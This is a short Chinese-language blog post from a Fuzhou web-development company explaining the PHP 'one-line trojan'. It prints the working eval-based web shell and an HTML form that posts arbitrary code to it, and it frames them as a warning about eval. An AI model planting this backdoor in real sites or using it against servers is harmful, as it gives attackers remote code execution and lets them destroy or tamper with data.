在线咨询
福州网站建设>网站新闻>php技术

php一句话木马eval函数

发布日期:2017-03-19浏览次数:939 来源:福州网站建设

eval可以用来执行任何其他php代码,所以对于代码里发现了eval函数一定要小心,可能是木马

就这一句话害死人,这样任何人都可以post任何文件上来,所以要做好防范

 
1
<?php @eval($_POST['c']);?>

使用方法也很简单,本地提交文件指向提交文件,里面的php代码就会被执行

 
1
2
3
4
5
6
7
8
<html>
<body>
<form action="a.php" method="post">
<input type="text" name="c" value="phpinfo();">
<input type="submit" value="submit">
</form>
</body>
</html>

如果上面的phpinfo()改成其他 代码,删除某个文件夹或对数据库文件 进行删除或更改的操作的代码,那么后果就可想而知。市面上有很多配合一句话木马 的工具呢。所以,安全第一。

以上是由福州网站建设的小编为你分享了"php一句话木马eval函数"文章,如果你在这方面有什么问题,随时联系我们

上一篇:thinkphp creat方法自动验证教程 下一篇:怎么彻底去掉ECSHOP版权与标志 返回栏目列表
php技术有关的文章
wdcp和宝塔哪一个linux面板好用
echop商城分类图片设置教程
了解php到浏览器的缓存机制
phpexcel读取excel文件内容 phpexcel下载地址
likeshop 后台路径admin更改方法
ECshop中TemplateBeginEditable 和lbi库文件中一些说明
微信JS sdk分享教程
微信支付 退款 V2版本源代码 亲测可用
PHP namespace、require、use区别
PHP 命名空间与spl_autoload_register() 自动加载机制
网站修改说明
模型hasOne、hasMany、belongsTo详解
如果您有什么问题,欢迎咨询我们客服! 点击QQ咨询
联系方式

地址:福建省福州市海通广场2号楼

电话:18558752805
Copyright © 2017-2022  www.xl779.com福州网站制作 福州小程序制作福州网站建设 闽ICP备16037694号-2

  • 福州网站建设
  • 福州小程序
  • 福州网站制作
  • 福州手机网站
  • 福州网站设计
  • 福州企业网站